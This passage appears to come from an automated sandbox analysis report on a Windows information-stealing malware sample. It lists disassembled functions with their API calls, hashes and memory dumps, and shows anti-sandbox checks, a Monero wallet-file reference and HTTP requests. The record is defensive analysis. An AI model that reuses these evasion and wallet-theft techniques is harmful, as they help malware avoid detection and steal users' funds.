                              • Instruction ID: d7da9e45cf139f71ce956e81fd9c20d5bcf7d69e18a503d4bdc578dd4b9cf035
                              • Opcode Fuzzy Hash: c6ef856b0e9e7a72246a9ade730e39dc41168ad15550aa4a375156bf7e9e07da
                              • Instruction Fuzzy Hash: E14193B1D1424CABDF10DF94DC45BEEBBB8EF48704F100199F609A7280DB786A45CBA5
                              Function 009F69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0768), ref: 009F98A1
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0798), ref: 009F98BA
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B07C8), ref: 009F98D2
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B07E0), ref: 009F98EA
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0648), ref: 009F9903
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B8870), ref: 009F991B
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013A6400), ref: 009F9933
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013A6380), ref: 009F994C
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B06C0), ref: 009F9964
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0780), ref: 009F997C
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0708), ref: 009F9995
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B07B0), ref: 009F99AD
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013A65E0), ref: 009F99C5
                                • Part of subcall function 009F9860: GetProcAddress.KERNEL32(75900000,013B0738), ref: 009F99DE
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                                • Part of subcall function 009E11D0: ExitProcess.KERNEL32 ref: 009E1211
                                • Part of subcall function 009E1160: GetSystemInfo.KERNEL32(?), ref: 009E116A
                                • Part of subcall function 009E1160: ExitProcess.KERNEL32 ref: 009E117E
                                • Part of subcall function 009E1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009E112B
                                • Part of subcall function 009E1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 009E1132
                                • Part of subcall function 009E1110: ExitProcess.KERNEL32 ref: 009E1143
                                • Part of subcall function 009E1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009E123E
                                • Part of subcall function 009E1220: __aulldiv.LIBCMT ref: 009E1258
                                • Part of subcall function 009E1220: __aulldiv.LIBCMT ref: 009E1266
                                • Part of subcall function 009E1220: ExitProcess.KERNEL32 ref: 009E1294
                                • Part of subcall function 009F6770: GetUserDefaultLangID.KERNEL32 ref: 009F6774
                                • Part of subcall function 009E1190: ExitProcess.KERNEL32 ref: 009E11C6
                                • Part of subcall function 009F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009E11B7), ref: 009F7880
                                • Part of subcall function 009F7850: RtlAllocateHeap.NTDLL(00000000), ref: 009F7887
                                • Part of subcall function 009F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
                                • Part of subcall function 009F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7910
                                • Part of subcall function 009F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009F7917
                                • Part of subcall function 009F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 009F6AF9
                              • Sleep.KERNEL32(00001770), ref: 009F6B04
                              • CloseHandle.KERNEL32(?,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6B1A
                              • ExitProcess.KERNEL32 ref: 009F6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 9da20c16bd431dd22bed16d5adf90c77b043a3d62d08e1d8d1cc846069d1fbe2
                              • Instruction ID: 52ad0f4bb50729d3fff418598f83691e4b30773bc72084d5a7c13bc5cb818da8
                              • Opcode Fuzzy Hash: 9da20c16bd431dd22bed16d5adf90c77b043a3d62d08e1d8d1cc846069d1fbe2
                              • Instruction Fuzzy Hash: 6B31EAB191420CABDB05FBE0DC56BFE7778AF84780F104528F316A6191DFB06A45C7A6
                              Function 009E1220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 9e1220-9e1247 call 9f89b0 GlobalMemoryStatusEx 1439 9e1249-9e1271 call 9fda00 * 2 1436->1439 1440 9e1273-9e127a 1436->1440 1442 9e1281-9e1285 1439->1442 1440->1442 1444 9e129a-9e129d 1442->1444 1445 9e1287 1442->1445 1447 9e1289-9e1290 1445->1447 1448 9e1292-9e1294 ExitProcess 1445->1448 1447->1444 1447->1448
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 009E123E
                              • __aulldiv.LIBCMT ref: 009E1258
                              • __aulldiv.LIBCMT ref: 009E1266
                              • ExitProcess.KERNEL32 ref: 009E1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: 3383881169e13fca5fb157edf941ac4d788c1dfb04fd1681badbc5b294e8cb4d
                              • Instruction ID: 0c4b3d83ea305ee8622678ca0b69b556e74d070f0b6e8b090246ffd719cf7325
                              • Opcode Fuzzy Hash: 3383881169e13fca5fb157edf941ac4d788c1dfb04fd1681badbc5b294e8cb4d
                              • Instruction Fuzzy Hash: 30011DB0D44348BBEF10EBE5CC49BAEBB78AB54705F208049E705B62C0D7B49A45CB99
                              Function 009F6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 9f6af3 1451 9f6b0a 1450->1451 1453 9f6b0c-9f6b22 call 9f6920 call 9f5b10 CloseHandle ExitProcess 1451->1453 1454 9f6aba-9f6ad7 call 9faad0 OpenEventA 1451->1454 1459 9f6ad9-9f6af1 call 9faad0 CreateEventA 1454->1459 1460 9f6af5-9f6b04 CloseHandle Sleep 1454->1460 1459->1453 1460->1451
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 009F6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 009F6AF9
                              • Sleep.KERNEL32(00001770), ref: 009F6B04
                              • CloseHandle.KERNEL32(?,00000000,?,013B89B0,?,00A0110C,?,00000000,?,00A01110,?,00000000,00A00AEF), ref: 009F6B1A
                              • ExitProcess.KERNEL32 ref: 009F6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: c475010d006219858d8492eb4ab5cf8ceca2586d937adf87ad06015148d0c4e0
                              • Instruction ID: cde0cce8bd0de6c15701e607e3e1cc61605bca10fbcd0ea7e538630517946a8d
                              • Opcode Fuzzy Hash: c475010d006219858d8492eb4ab5cf8ceca2586d937adf87ad06015148d0c4e0
                              • Instruction Fuzzy Hash: C0F05870A5430DABE720ABA0DC0ABBE7B38EF48B02F104914F703E15D1CBB09541DBA6
                              Function 009E47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 422bd0c6db82e2cdb8237d8b6c960365cc916830b64e0b7efd04ecc0deeee09d
                              • Instruction ID: b8dbfbf189e6e6469acb50d71290cf34cec7b6882b0db980230aac9929f86cd6
                              • Opcode Fuzzy Hash: 422bd0c6db82e2cdb8237d8b6c960365cc916830b64e0b7efd04ecc0deeee09d
                              • Instruction Fuzzy Hash: 71213EB1D00209ABDF14DFA5EC45BDE7B75FB44320F108625FA15A7291EB706A0ACB91
                              Function 009F51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E6280: InternetOpenA.WININET(00A00DFE,00000001,00000000,00000000,00000000), ref: 009E62E1
                                • Part of subcall function 009E6280: StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E6303
                                • Part of subcall function 009E6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E6335
                                • Part of subcall function 009E6280: HttpOpenRequestA.WININET(00000000,GET,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E6385
                                • Part of subcall function 009E6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009E63BF
                                • Part of subcall function 009E6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009E63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009F5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 794428de3d9ee012958c0f150fbc3e9d0aeda0fafeb18bcc85cd5825bb8a1d15
                              • Instruction ID: 363a4db6b4f7062b2289bc02c27438c6d85efa1cef3fe5ff54a726bfcd56f265
                              • Opcode Fuzzy Hash: 794428de3d9ee012958c0f150fbc3e9d0aeda0fafeb18bcc85cd5825bb8a1d15
                              • Instruction Fuzzy Hash: BF110AB091014CABCB14FF60DD52BFD7338AF90340F508558FA1A4A5A2EF74AB0AC791
                              Function 009E1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 009E112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 009E1132
                              • ExitProcess.KERNEL32 ref: 009E1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: ed458dbef2709be73005bb90b4d5b6ed61d33c89d2075e6361a4d4f831fdaa5e
                              • Instruction ID: c83e190d55bde947702d3bc93f117f9c85f4122543b816bab4e70bc57434fbf9
                              • Opcode Fuzzy Hash: ed458dbef2709be73005bb90b4d5b6ed61d33c89d2075e6361a4d4f831fdaa5e
                              • Instruction Fuzzy Hash: 62E01D7095534CFFE7306BA1DC0EB0D767CEB04B02F104054F709B65D0D6B52A41969D
                              Function 009E10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 009E10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 009E10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 538ee9a9e1b93467fd086162168974ecb946c0ce97a116c39bf52f7e944949f7
                              • Instruction ID: d9d029bfcd1f70d854a32533cb4a9a7970c5f88b11fd5e29af274843d9bb5403
                              • Opcode Fuzzy Hash: 538ee9a9e1b93467fd086162168974ecb946c0ce97a116c39bf52f7e944949f7
                              • Instruction Fuzzy Hash: 54F0E271641208BBEB149AA4AC49FBFB7ECE705B15F300848F604E3280D5719E40CAA4
                              Function 009E1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 009F78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7910
                                • Part of subcall function 009F78E0: RtlAllocateHeap.NTDLL(00000000), ref: 009F7917
                                • Part of subcall function 009F78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
                                • Part of subcall function 009F7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009E11B7), ref: 009F7880
                                • Part of subcall function 009F7850: RtlAllocateHeap.NTDLL(00000000), ref: 009F7887
                                • Part of subcall function 009F7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
                              • ExitProcess.KERNEL32 ref: 009E11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 6baf08cce773b162fa8e9da7c6fdaeb18cb9cf3fe78167d368dd913b4e5f9141
                              • Instruction ID: f8ae2a2d02670dd1ac06e106dfa4eec5d95c4fee3fedbc1a15418ed1a765b862
                              • Opcode Fuzzy Hash: 6baf08cce773b162fa8e9da7c6fdaeb18cb9cf3fe78167d368dd913b4e5f9141
                              • Instruction Fuzzy Hash: D9E012B592430957CE1477F5AC4AB3F329C9B54785F080424FB05D2602FA25E811876A

                              Non-executed Functions

                              Function 009F38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 009F38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 009F38E3
                              • lstrcat.KERNEL32(?,?), ref: 009F3935
                              • StrCmpCA.SHLWAPI(?,00A00F70), ref: 009F3947
                              • StrCmpCA.SHLWAPI(?,00A00F74), ref: 009F395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 009F3C67
                              • FindClose.KERNEL32(000000FF), ref: 009F3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmpDownload File
